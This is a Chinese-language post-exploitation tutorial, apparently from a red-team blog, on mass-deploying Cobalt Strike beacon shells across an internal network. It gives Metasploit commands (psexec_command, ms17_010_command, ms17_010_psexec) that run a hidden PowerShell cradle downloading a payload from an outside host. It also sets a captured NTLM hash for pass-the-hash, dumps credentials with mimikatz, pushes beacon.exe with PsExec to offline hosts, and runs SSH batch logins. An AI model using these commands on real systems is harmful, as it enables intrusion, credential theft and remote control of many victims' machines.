利用msf模組上線beacon shell
當通過CS的mimikatz或者其他方式獲得了目標機器的明文密碼或者雜湊時,可以利用metasploit的psexec_command模組來上線CS的beacon shell。
1.先通過CS生成上線Beacon的powershell
本地啟動metasploit,掛上代理,設定psexec_command引數。
msf5 > setg Proxies socks4/5:97.xx.xx.23:1025
msf5 > use auxiliary/admin/smb/psexec_command
msf5 > set rhosts 192.168.52.0/24
msf5 > set threads 20
msf5 > set smbuser administrator
msf5 > set smbpass 579da618cfbfa85247acf1f800a280a4
msf5 > set command powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://97.xx.xx.23:82/a'))"
msf5 > run
當進入內網後,拿下一臺或某幾臺機器時,若密碼相同或相似,可以使用該方式直接通掃內網,可以做到機器批量上線。
通過ms17-010通掃內網(未成功!!!)
如果內網發現大量主機存在ms17-010,直接使用exploit/windows/smb/ms17_010_eternalblue該模組容易造成藍屏,可以通過ms17_010命令執行模組做到批量上線。如:ms17_010_command、ms17_010_psexec等。
setg Proxies socks4:97.xx.xx.23:1008
use auxiliary/admin/smb/ms17_010_command
set rhosts 192.168.52.0/24
set threads 50
set command 'powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://97.xx.xx.23:82/a'))"'
run
use exploit/windows/smb/ms17_010_psexec
set rhosts 192.168.100.2
set SMBUser guest
set SMBPass 123456
run
當獲取到一臺目標伺服器的許可權,如果想擴大戰果,獲得目標憑證進行橫向擴充套件登入是最快速有效的方式。需要考慮的是目標環境是否可出網,如何利用CS進行批量上線。
1.目標機器上線後先提權抓取憑證
Access---》run mimikatz(或者直接在Beacon中執⾏logonpasswords匯出明文密碼),或直接dumphash。匯出憑證操作需要管理員許可權。
通過工具欄的View---》Credentials可以檢視已經獲得的憑證
1)目標出網
psexec傳遞
獲取憑證後可以對內網445進行探測,然後使用psexec傳遞登入
Beacon > portscan 192.168.52.0/24 445 arp 200
通過選單欄View---》Targets檢視目標機器列表,可以全部選中,批量右鍵登入
選擇之前獲取到的主機的憑證,並確定接受的Listener已經主機的session。
在Beacon中可以看到執行的命令,並顯示成功登入的IP,這樣就可以實現同時控制多臺主機的許可權。
2)目標機不出網
如果我們已經獲取到目標內網中一臺主機的許可權,但是該主機處於隔離網中,無法連線網際網路,此時,我們可以將這臺已經獲取許可權的主機當做跳板,在它做上面做一個監聽,實現鏈路上線。
1.首先,在已上線的主機上建立一個Listener
選擇 Attacks->Packages->Windows Executable(Stageless),⽀持匯出該型別Listener對應的可執
⾏⽂件或dll等。proxy不填。
上傳剛才⽣成的payload到當前已上線的⽬標機中,還需要上傳另⼀個⼯具PsExec.exe 。
(CobalStrike本身psexec功能不夠強⼤,且⽅法不唯⼀)
在Beacon中使⽤PsExec⼯具將payload上傳到不出⽹的⽬標機中,⾃動執⾏,即可上線。
beacon> shell C:\WINDOWS\Temp\PsExec.exe -accepteula
\192.168.190.130,192.168.190.132 -u administrator -p admin@123 -d -c
C:\WINDOWS\Temp\beacon.exe
因為這是link連結,只要主鏈路(即出⽹機Listener)掉線,就都會掉線!
3)ssh 批量登入
ssh批量登入⽐較簡單,同樣利⽤當前已上線的⽬標機進⾏登入。
beacon> portscan 192.168.144.170-210 22 arp 200
在Credentials中新增ssh的⼝令資訊。(ssh⼝令可事先通過其他⽅式獲取,不建議⽤此⼯具進⾏
ssh爆破,效率慢)
選擇Login–>ssh登入。
選擇剛新增的ssh⼝令,主機Session,即從哪臺主機連線過去。
ssh成功登入後,就實現了Linux⽬標機的上線,在Beacon中可以看到執⾏的命令。若需要上線的
Linux主機不多,可直接在Beacon中執⾏命令。